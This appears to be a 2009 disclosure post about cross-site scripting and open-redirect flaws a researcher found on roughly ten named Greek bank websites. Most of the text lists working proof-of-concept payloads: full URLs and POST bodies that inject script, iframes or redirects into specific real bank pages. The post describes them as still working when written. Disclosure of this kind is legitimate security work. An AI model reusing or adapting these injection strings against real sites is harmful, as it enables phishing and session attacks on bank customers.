
 Major Greek bank sites with SSL vulnerable to XSS and open redirects

Written by DP

Sunday, 10 May 2009

Security researcher "Hexspirit" has discovered multiple XSS and open redirect vulnerabilities affecting all major Greek bank websites.

Fraudsters could exploit these cross-site scripting flaws to conduct convincing phishing attacks against e-banking customers and site visitors. Most of the affected pages are served over SSL, so injected content appears on the bank's own domain over HTTPS: security cannot be guaranteed just by the presence of "https" at the start of a URL, or by checking that the browser address bar contains the correct domain name.

All the reported vulnerabilities are still working at the time of writing, and we hope they will be fixed as soon as possible.

Greek Banks XSS Mirrors:


winbank.gr XSS Mirror (SSL)

URL: https://www.winbank.gr/utils/iban1/iban_GR.asp
POST: PBAccount=&HiddenPirAccount=&HiddenPrintMode=0&OtherAccount=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F%3E&submit2=%C5%F0%E9%E2%E5%E2%E1%DF%F9%F3%E7



millenniumbank.gr XSS Mirror (no SSL)

URL: http://www.millenniumbank.gr/MillenniumVB/Templates_NB_Tools/NB_PopUp_IBANCalculator.aspx?LANGID=30&MENU=CALC

POST: txtAccountNo=&_ctl0%3AtxtIBANCheck=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F%3E&_ctl0%3AbtnCheckIBAN=%CE%88%CE%BB%CE%B5%CE%B3%CF%87%CE%BF%CF%82



probank.gr XSS Mirror (SSL)

URL: https://www.probank.gr/search/index.php?qu=%22%3Cmarquee%3E%3Cimg+src%3Dk.png+onerror%3Dalert(%2FXSS%2F)+%2F%3E%3Ch1%3EXSSed%3C%2Fh1%3E


proton.gr XSS Mirror (SSL)
protonbank.gr XSS Mirror (SSL)

URL: https://www.proton.gr/search/index.php?sid=61f882a8fc8dd3e8e175a416b0fb0afa&qu=%22%3E%3Cimg%20src=k%20onerror=alert(/XSS/)%20/%3E%3Ciframe%20src=%22http://www.xssed.com%22%3E

URL: https://www.protonbank.gr/search/index.php?sid=5aa6fd152554b75ef8d5da27c103eff9&qu=%22%3E%3Cimg+src%3Dk+onerror%3Dalert(%2FXSS%2F)+%2F%3E%3Ciframe+src%3D%22http%3A%2F%2Fwww.xssed.com%22%3E


eurobank.gr XSS Mirror (SSL)

URL: https://www.eurobank.gr/europortal/content/europortal/gr/content/privateservices/ibancalc.asp
POST: branch=3243&cd=43&main=%22%3Cimg+src%3D%22%22+onerror%3D%22write%28%27%3Cbody%3E%3Cb%3EHexspirit+was+here.+XSS+flaw.%3C%2Fb%3E%27%29%3Bclose%28%29%3Balert%28body.innerHTML%29%22+%2F%3E&account=&ibanspace=&source=


nbg.gr Open redirect Mirror (SSL)

URL: https://e-loans.nbg.gr/webaccess/nbg/hanbg/loading.asp?pn=http://www.xssed.com



alpha.gr XSS Mirror (SSL)

URL: https://www.alpha.gr/tools/account.asp?Error=1&Browser=nc&AccountNumber="><img+src=""
onError="document.location='http://xssed.com'">


bankofcyprus.gr Open redirect Mirror (no SSL)

URL: http://www.bankofcyprus.gr/adredir2.asp?url=http://www.xssed.com


ttbank.gr XSS Mirror

URL: http://www.ttbank.gr/default.asp?langID=1&pageID=122&siteID=1&SearchWord=%22%3E%3Cmarquee%3E%3Cimg+src=%22%22+onerror=%22write(%27%3Cb%3EHOHO%20XSSed%3C/b%3E%27);close();%22+/%3E&x=10&y=7


dias.com.gr XSS Mirror (no SSL)

URL: http://www.dias.com.gr/dias/content/main.asp?menu=2&search=%22%3E%3Ciframe%20src=%22http://www.xssed.com%22%3E

